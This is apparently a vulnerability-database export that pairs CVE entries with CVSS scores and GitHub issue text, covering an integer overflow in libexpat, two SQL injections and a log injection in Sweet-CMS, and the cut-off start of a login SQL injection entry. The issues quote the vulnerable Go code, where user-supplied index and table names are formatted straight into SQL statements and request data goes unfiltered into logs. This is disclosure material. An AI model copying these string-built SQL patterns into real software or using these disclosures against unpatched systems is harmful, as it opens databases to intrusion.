[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/libexpat/libexpat/issues/889" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/libexpat/libexpat/pull/892" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20241018-0005/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDDF6E7A-AF1C-4370-B0B0-29A35C454FFB", "versionEndExcluding": "2.6.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/libexpat/libexpat/issues/889
[ "Issue Tracking" ]
github.com
[ "libexpat", "libexpat" ]
`xmlparse.c` has an integer overflow for `m_groupSize` on 32-bit platforms, which may cause denial of service or code execution.
CVE-2024-45492
https://api.github.com/repos/libexpat/libexpat/issues/889/comments
1
2024-08-26T03:42:49Z
2024-09-05T01:23:58Z
https://github.com/libexpat/libexpat/issues/889
2,485,800,734
889
6,251
CVE-2024-8332
2024-08-30T12:15:04.657
A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been declared as critical. This vulnerability affects unknown code of the file /table/index. The manipulation leads to sql injection. The attack can be initiated remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 146359646a5a90cb09156dbd0013b7df77f2aa6c. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/master-nan/sweet-cms/commit/146359646a5a90cb09156dbd0013b7df77f2aa6c" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276208" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276208" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.398803" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:master-nan:sweet-cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFB82646-0A21-4490-A9EB-0264F9692648", "versionEndExcluding": "2024-08-28", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/master-nan/sweet-cms/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "master-nan", "sweet-cms" ]
In line 63 of the repository/impl/ sys_table_imp.go file, you use fmt.Sprintf to build SQL statements directly, including user-supplied values (via the parameters indexName, tableName, and fields). If an attacker is able to control any of these parameters, they could inject malicious SQL code into them to manipulate database queries or perform other malicious operations. code flow: from route /table/index ``` 代码 initialize/router.go 片段(行 74 到 74 ): adminGroup.POST("/table/index", app.TableController.CreateTableIndex) 代码 controller/sys_table_controller.go 片段(行 339 到 339 ): func (t *TableController) CreateTableIndex(ctx *gin.Context) { 代码 controller/sys_table_controller.go 片段(行 344 到 344 ): err := utils.ValidatorBody[request.TableIndexCreateReq](ctx, &data, translator) 代码 controller/sys_table_controller.go 片段(行 349 到 349 ): err = t.sysTableService.CreateTableIndex(ctx, data) 代码 service/sys_table_service.go 片段(行 555 到 555 ): func (s *SysTableService) CreateTableIndex(ctx *gin.Context, req request.TableIndexCreateReq) error { 代码 service/sys_table_service.go 片段(行 556 到 556 ): err := s.sysTableRepo.ExecuteTx(ctx, func(tx *gorm.DB) error { 代码 service/sys_table_service.go 片段(行 592 到 592 ): if e := s.sysTableRepo.CreateTableIndex(tx, req.IsUnique, req.IndexName, table.TableCode, fields); e != nil { 代码 repository/impl/sys_table_impl.go 片段(行 56 到 56 ): func (s *SysTableRepositoryImpl) CreateTableIndex(tx *gorm.DB, isUnique bool, indexName string, tableCode string, fields string) error { 代码 repository/impl/sys_table_impl.go 片段(行 62 到 62 ): createIndexSql := fmt.Sprintf("CREATE %s INDEX %s ON %s (%s)", unique, indexName, tableName, fields) 代码 repository/impl/sys_table_impl.go 片段(行 62 到 62 ): createIndexSql := fmt.Sprintf("CREATE %s INDEX %s ON %s (%s)", unique, indexName, tableName, fields) 代码 repository/impl/sys_table_impl.go 片段(行 63 到 63 ): return tx.Exec(createIndexSql).Error ``` ``` type TableIndexCreateReq struct { TableId int `json:"table_id" binding:"required"` IndexName string `json:"index_name" binding:"required"` IsUnique bool `json:"is_unique" binding:"required"` IndexFields []TableIndexFieldReq `json:"index_fields" binding:"required,min=1"` } ```
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in /table/index
https://api.github.com/repos/master-nan/sweet-cms/issues/1/comments
1
2024-08-27T16:59:13Z
2024-08-28T06:42:48Z
https://github.com/master-nan/sweet-cms/issues/1
2,489,915,764
1
6,252
CVE-2024-8332
2024-08-30T12:15:04.657
A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been declared as critical. This vulnerability affects unknown code of the file /table/index. The manipulation leads to sql injection. The attack can be initiated remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 146359646a5a90cb09156dbd0013b7df77f2aa6c. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/master-nan/sweet-cms/commit/146359646a5a90cb09156dbd0013b7df77f2aa6c" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276208" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.276208" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.398803" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:master-nan:sweet-cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFB82646-0A21-4490-A9EB-0264F9692648", "versionEndExcluding": "2024-08-28", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/master-nan/sweet-cms/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "master-nan", "sweet-cms" ]
Vulnerability Description: The query relies on user-supplied values. In this case, the problem is with the dynamically constructed dropIndexSQL statement. Using user-supplied 'indexName' and 'tableName' to insert directly into SQL statements without proper validation and/or escape can lead an attacker to insert malicious SQL code that can perform illegal database operations. code flow: from route /table/index/:id ``` 代码 initialize/router.go 片段(行 75 到 75 ): adminGroup.PUT("/table/index/:id", app.TableController.UpdateTableIndex) 代码 controller/sys_table_controller.go 片段(行 357 到 357 ): func (t *TableController) UpdateTableIndex(ctx *gin.Context) { 代码 controller/sys_table_controller.go 片段(行 362 到 362 ): err := utils.ValidatorBody[request.TableIndexUpdateReq](ctx, &data, translator) 代码 controller/sys_table_controller.go 片段(行 367 到 367 ): err = t.sysTableService.UpdateTableIndex(ctx, data) 代码 service/sys_table_service.go 片段(行 602 到 602 ): func (s *SysTableService) UpdateTableIndex(ctx *gin.Context, req request.TableIndexUpdateReq) error { 代码 service/sys_table_service.go 片段(行 603 到 603 ): err := s.sysTableRepo.ExecuteTx(ctx, func(tx *gorm.DB) error { 代码 service/sys_table_service.go 片段(行 616 到 616 ): if e := s.sysTableRepo.DropTableIndex(tx, req.IndexName, table.TableCode); e != nil { 代码 repository/impl/sys_table_impl.go 片段(行 67 到 67 ): func (s *SysTableRepositoryImpl) DropTableIndex(tx *gorm.DB, indexName string, tableCode string) error { 代码 repository/impl/sys_table_impl.go 片段(行 70 到 70 ): dropIndexSQL := fmt.Sprintf("DROP INDEX %s ON %s", indexName, tableName) 代码 repository/impl/sys_table_impl.go 片段(行 70 到 70 ): dropIndexSQL := fmt.Sprintf("DROP INDEX %s ON %s", indexName, tableName) 代码 repository/impl/sys_table_impl.go 片段(行 71 到 71 ): return tx.Exec(dropIndexSQL).Error ```
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in /table/index/:id
https://api.github.com/repos/master-nan/sweet-cms/issues/2/comments
1
2024-08-27T17:02:33Z
2024-08-28T06:43:05Z
https://github.com/master-nan/sweet-cms/issues/2
2,489,921,868
2
6,253
CVE-2024-8334
2024-08-30T13:15:12.587
A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been rated as problematic. This issue affects the function LogHandler of the file middleware/log.go. The manipulation leads to improper output neutralization for logs. The attack may be initiated remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 2024c370e6c78b07b358c9d4257fa5d1be732c38. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/master-nan/sweet-cms/commit/2024c370e6c78b07b358c9d4257fa5d1be732c38" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/3#issuecomment-2314447003" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.276209" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276209" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.398805" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:master-nan:sweet-cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D137526-44BB-408B-9776-E98590D6EFD6", "versionEndExcluding": null, "versionEndIncluding": "2024-08-27", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "117" ]
117
https://github.com/master-nan/sweet-cms/issues/3
[ "Issue Tracking" ]
github.com
[ "master-nan", "sweet-cms" ]
Cause of vulnerability: In lines 58-62 of the file 'middleware/log.go', the log entry relies on a user-supplied value (' c.reequest '). If the values provided by the user contain special characters or malicious code, these values may be logged directly into the log, resulting in log injection attacks. Attackers may manipulate the content of logs by submitting specific requests, which may lead to security issues such as leakage of sensitive information and misuse of log files. This is a typical log injection vulnerability. middleware/log.go line 57-65 ``` zap.L().Info("用户访问日志:", zap.String("uri", c.Request.URL.Path), zap.String("method", c.Request.Method), zap.Any("query", c.Request.URL.Query()), zap.Any("body", c.Request.Body), zap.Any("response", responseBody), zap.String("ip", c.ClientIP()), zap.String("duration", fmt.Sprintf("%.4f seconds", duration.Seconds()))) zap.L().Info("Access Log end") ```
Improper Output Neutralization for Logs in middleware/log.go
https://api.github.com/repos/master-nan/sweet-cms/issues/3/comments
1
2024-08-27T17:03:15Z
2024-08-28T06:43:51Z
https://github.com/master-nan/sweet-cms/issues/3
2,489,923,237
3
6,254
CVE-2024-8334
2024-08-30T13:15:12.587
A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been rated as problematic. This issue affects the function LogHandler of the file middleware/log.go. The manipulation leads to improper output neutralization for logs. The attack may be initiated remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 2024c370e6c78b07b358c9d4257fa5d1be732c38. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/master-nan/sweet-cms/commit/2024c370e6c78b07b358c9d4257fa5d1be732c38" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/master-nan/sweet-cms/issues/3#issuecomment-2314447003" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.276209" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276209" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.398805" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:master-nan:sweet-cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D137526-44BB-408B-9776-E98590D6EFD6", "versionEndExcluding": null, "versionEndIncluding": "2024-08-27", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "117" ]
117
https://github.com/master-nan/sweet-cms/issues/3#issuecomment-2314447003
[ "Issue Tracking" ]
github.com
[ "master-nan", "sweet-cms" ]
Cause of vulnerability: In lines 58-62 of the file 'middleware/log.go', the log entry relies on a user-supplied value (' c.reequest '). If the values provided by the user contain special characters or malicious code, these values may be logged directly into the log, resulting in log injection attacks. Attackers may manipulate the content of logs by submitting specific requests, which may lead to security issues such as leakage of sensitive information and misuse of log files. This is a typical log injection vulnerability. middleware/log.go line 57-65 ``` zap.L().Info("用户访问日志:", zap.String("uri", c.Request.URL.Path), zap.String("method", c.Request.Method), zap.Any("query", c.Request.URL.Query()), zap.Any("body", c.Request.Body), zap.Any("response", responseBody), zap.String("ip", c.ClientIP()), zap.String("duration", fmt.Sprintf("%.4f seconds", duration.Seconds()))) zap.L().Info("Access Log end") ```
Improper Output Neutralization for Logs in middleware/log.go
https://api.github.com/repos/master-nan/sweet-cms/issues/3/comments
1
2024-08-27T17:03:15Z
2024-08-28T06:43:51Z
https://github.com/master-nan/sweet-cms/issues/3
2,489,923,237
3
6,255
CVE-2024-8368
2024-09-01T05:15:12.187
A vulnerability was found in code-projects Hospital Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": 